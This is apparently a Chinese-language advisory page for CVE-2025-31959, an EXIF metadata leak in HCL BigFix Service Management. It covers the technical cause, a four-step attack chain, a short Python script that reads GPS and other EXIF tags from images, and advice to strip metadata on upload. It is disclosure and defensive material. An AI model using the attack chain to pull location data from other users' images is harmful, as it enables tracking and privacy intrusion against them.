CVE-2025-31959 CVSS 3.5 低危

CVE-2025-31959 HCL BigFix SM EXIF信息泄露

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-31959

漏洞类型

信息泄露

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

HCL BigFix Service Management (SM)

漏洞概述

HCL BigFix Service Management (SM) 应用程序在处理用户上传的图片时存在安全缺陷，未能清除图片中的EXIF元数据。这可能导致敏感的地理位置信息等隐私数据被泄露，攻击者可利用此信息追踪用户位置。

技术细节

该漏洞产生的原因是HCL BigFix SM应用在服务器端接收到用户上传的图片文件后，缺乏对文件元数据的清洗机制。JPEG等格式的图片通常包含EXIF（Exchangeable Image File Format）数据，其中可能记录了拍摄设备型号、时间以及精确的GPS经纬度坐标。由于应用未在存储或分发前剥离这些信息，任何能够访问该图片的用户均可下载并解析原始文件。攻击者无需进行复杂的代码注入或权限提升，仅需利用低权限账号上传或下载图片，并使用标准的EXIF提取工具（如exiftool）即可获取其中的隐私信息。这违反了最小权限原则和隐私保护最佳实践。

攻击链分析

STEP 1

1. 获取访问权限

攻击者注册或获取一个低权限账号，访问HCL BigFix SM应用。

STEP 2

2. 图片上传/下载

攻击者上传包含恶意EXIF数据（如GPS坐标）的图片，或下载其他用户上传的原始图片。

STEP 3

3. 元数据提取

攻击者使用EXIF解析工具对获取的图片文件进行分析，提取隐藏的地理位置和设备信息。

STEP 4

4. 信息利用

利用提取出的GPS坐标确定拍摄者的物理位置，导致隐私泄露或辅助物理渗透攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import PIL.Image
from PIL.ExifTags import TAGS, GPSTAGS

def get_exif_data(image_path):
    """
    Proof of Concept to extract EXIF data from an image.
    This simulates an attacker analyzing a downloaded image.
    """
    try:
        image = PIL.Image.open(image_path)
        # Verify if image has EXIF data
        exif_data = image._getexif()
        if exif_data is None:
            print("No EXIF metadata found.")
            return

        print(f"[+] Analyzing {image_path}...")
        for tag, value in exif_data.items():
            tag_name = TAGS.get(tag, tag)
            
            # Extract GPS Info specifically
            if tag_name == "GPSInfo":
                print(f"  [!] Found GPS Info:")
                for gps_tag in value:
                    gps_tag_name = GPSTAGS.get(gps_tag, gps_tag)
                    print(f"    {gps_tag_name}: {value[gps_tag]}")
            else:
                # Print other common tags (filtering binary data for display)
                if isinstance(value, (str, int, float, tuple)):
                    print(f"  {tag_name}: {value}")

    except Exception as e:
        print(f"Error: {e}")

# Example usage:
# get_exif_data("vulnerable_image.jpg")

影响范围

HCL BigFix Service Management (SM) (具体受影响版本请参考官方公告KB0128144)

防御指南

临时缓解措施

建议管理员在系统修复前，手动配置服务器端的图片处理中间件（如ImageMagick或PIL脚本），对所有上传的图片进行无损过滤，去除EXIF、IPTC和XMP等元数据后再进行存储。同时，应审查现有存储的图片资源，确保敏感信息已被清理。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表